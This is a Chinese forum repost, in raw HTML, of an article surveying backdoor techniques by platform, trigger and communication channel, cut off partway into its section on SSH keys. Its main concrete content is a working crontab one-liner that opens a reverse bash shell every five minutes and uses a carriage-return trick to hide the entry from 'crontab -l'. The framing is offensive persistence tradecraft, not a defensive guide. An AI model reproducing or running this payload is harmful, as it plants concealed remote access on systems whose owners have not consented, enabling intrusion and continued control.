后门设置总结

论坛 期权论坛     
选择匿名的用户   2021-5-26 13:38   11   0
<div class="blogpost-body" id="cnblogs_post_body">
<p style="text-indent:2em;text-align:left;"><span style="font-size:18px;"><strong><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;">前言</span></strong></span></p>
<hr>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;text-indent:2em;">没有最好的后门,只有最合适的后门。</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;color:#ff0000;">时光荏苒,岁月如梭,在这篇文章里,我将对后门的各种形式进行解读和总结,这不仅仅是能帮你找到回忆,更希望的是能给予大家帮助、启发思考。</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;">后门种类繁多,林林总总,根据不同的需求出现了很多奇怪好玩的后门。它可以是一行简单的代码,也可以是复杂的远控木马,它可以是暴力的,也可以是很优雅的。</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;">在整体架构上,一个优秀的后门应该充分考虑其功能、触发方式和通信方式等方面。针对不同的方面,杀软也会根据其特征进行处理。为了进一步的持续性控制以及后渗透,后门越显复杂化。从后门的发展史中可看出,这是一场攻与防的持续性较量。</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;">从终端平台的角度看,后门可分为Linux型、Windows型和IOT型;</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;">对于Linux而言,从后门的形式上看,可分为配置型、logger型和rookit型;</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;">对于windows而言,从后门触发方式的角度看,可分为Registry型、Schtasks型和WMI型;</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;">从通信方式的角度看,后门可分为http/https型、irc型、dns型、icmp型等等;</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;">从网站应用的角度看,后门可分为模块扩展型、后端语言型和配置文件型。</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;">......</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-size:18px;"><strong><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;"> </span></strong></span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-size:18px;"><strong><span style="font-size:18px;font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;">终端类</span></strong></span></p>
<hr>
<p style="text-indent:2em;text-align:left;"><span style="color:#0070c0;"><strong><span style="color:#0070c0;font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;text-indent:2em;">一. Linux后门</span></strong></span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;color:#ff0000;">1. 配置型</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;">这里的配置型是指借助Linux系统本身的一些特性来完成后门布置功能。</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;color:#00b050;">1.1 crontab后门</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;">运维经常会用到该命令,这相当于windows的计划任务,规定时间来执行指定命令。这通常与反弹shell一起运用。</span></p>
<table border="0" cellpadding="0" cellspacing="0" class="syntaxhighlighter plain"><tbody><tr><td class="gutter">
     <div class="line number1 index0 alt2">
      1
     </div> </td><td class="code">
     <div>
      <div class="line number1 index0 alt2">
       <code class="plain">(crontab -l;printf &#34;*/5 * * * * exec9&lt;&gt; /dev/tcp/localhost/8080&amp;&amp;exec0&lt;&amp;9&amp;&amp;exec1&gt;&amp;92&gt;&amp;1&amp;&amp;/bin/bash --noprofile –I;\rno crontab for &#96;whoami&#96;%100c\n&#34;)|crontab -</code>
      </div>
     </div> </td></tr></tbody></table>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;text-indent:2em;color:#00b050;">1.2 ssh公钥免密</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:&#39;微软雅黑&#39;, &#39;Microsoft YaHei&#39;;">将客户端生成的ssh公钥
分享到 :
0 人收藏
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

积分:3875789
帖子:775174
精华:0
期权论坛 期权论坛
发布
内容

下载期权论坛手机APP